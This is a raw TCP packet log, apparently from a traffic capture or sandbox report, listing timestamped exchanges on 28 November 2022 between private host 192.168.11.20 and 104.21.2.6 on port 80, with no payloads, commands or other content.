                                                                    Nov 28, 2022 16:37:04.449590921 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.449590921 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.449598074 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449609995 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449620962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449639082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449651003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449661970 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449671984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449691057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449702978 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449713945 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449724913 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449742079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449764013 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.449768066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449779987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449810982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449821949 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449834108 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449851990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449865103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449876070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449879885 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.449887037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449906111 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449932098 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449943066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449954033 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449965954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449976921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.449987888 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.450001955 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.450026989 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.450026989 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.450195074 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.450365067 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.618186951 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.627141953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.627252102 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.627265930 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.627487898 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.627681017 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.636779070 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.645737886 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.645857096 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.645876884 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.645905972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.645948887 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.645962954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646007061 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646023035 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646038055 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646049976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646060944 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646075964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646106005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646125078 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.646125078 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.646137953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646151066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646178007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646193981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646205902 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646219015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646231890 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646246910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646259069 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646284103 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.646286964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646302938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646327972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646356106 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646373034 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646385908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646401882 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646414042 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646426916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646435976 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.646439075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646457911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646471977 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646483898 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646498919 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646527052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646557093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646570921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646596909 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646625042 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.646625042 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.646629095 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646641970 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646657944 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646686077 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646697998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646728992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646742105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646754026 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646770954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646775007 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.646784067 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646796942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646811962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646826982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646840096 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646852016 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646871090 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646883965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646895885 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646908998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646924973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646938086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646944046 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.646944046 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.646950960 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646965027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646981001 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.646994114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647006035 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647021055 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647034883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647047997 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647059917 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647078037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647094011 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647106886 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647114992 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.647119999 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647135973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647149086 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647161007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647175074 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647191048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647202969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647216082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647231102 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647245884 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647258997 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647270918 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647273064 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.647285938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647300005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647311926 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647325039 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647340059 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647355080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647367954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647380114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647397995 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647412062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647423983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647437096 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647445917 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.647455931 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647469044 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647481918 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647496939 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647512913 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647526026 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647537947 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647557020 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647571087 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647583961 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647598028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647614956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647615910 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.647617102 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.647627115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647639990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647651911 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647667885 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647680044 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647692919 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647705078 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647723913 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647737980 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647749901 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647766113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647779942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647785902 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.647792101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647804022 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647820950 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647835970 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647849083 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647861958 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647881031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647893906 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647906065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647921085 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647934914 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647947073 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647958994 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647959948 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.647959948 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.647974968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.647990942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.648004055 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.648015976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.648029089 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.648045063 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.648056984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.648083925 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.648099899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.648112059 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.648143053 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.648179054 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.648226976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.648292065 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.648335934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.648350000 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.648509026 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.648680925 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.657505989 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.657618046 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.657638073 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.657650948 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.657661915 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.657675028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.657696962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.657798052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.657812119 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.657829046 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.657840967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.657850027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.657876968 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.657876968 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.657984018 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.658014059 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.658046007 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.658046007 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.658123016 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.658135891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.658148050 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.658164024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.658175945 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.658195972 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.658195972 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.658202887 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.658220053 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.658231974 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.658334017 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.658346891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.658366919 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.658366919 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.658461094 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.658629894 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.658926010 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.659058094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.659152031 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.659154892 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.659167051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.659199953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.659213066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.659231901 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.659245014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.659257889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.659270048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.659282923 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.659295082 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.659327030 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.659327030 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.659327030 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.659495115 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.659543037 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.659873009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.659981966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.660054922 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.660075903 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.660082102 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.660099030 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.660125017 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.660166979 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.660180092 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.660192966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.660208941 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.660233974 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.660238028 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.660238028 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.660248041 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.660407066 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.660586119 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.660851955 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.660999060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661012888 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661036968 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661072969 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661087990 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.661169052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661184072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661199093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661211014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661221981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661252022 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.661330938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661345005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661427975 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.661427975 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.661597013 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.661770105 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.661832094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661922932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661935091 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661946058 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661974907 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661986113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.661997080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.662013054 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.662024975 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.662035942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.662180901 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.662183046 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.662183046 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.662193060 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.662354946 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.662522078 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.662781000 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.662898064 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.662955046 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.662962914 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.662966967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.662977934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.662993908 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.663006067 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.663058996 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.663070917 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.663080931 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.663095951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.663108110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.663132906 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.663132906 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.663305044 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.663752079 CET8049830104.21.2.6192.168.11.20
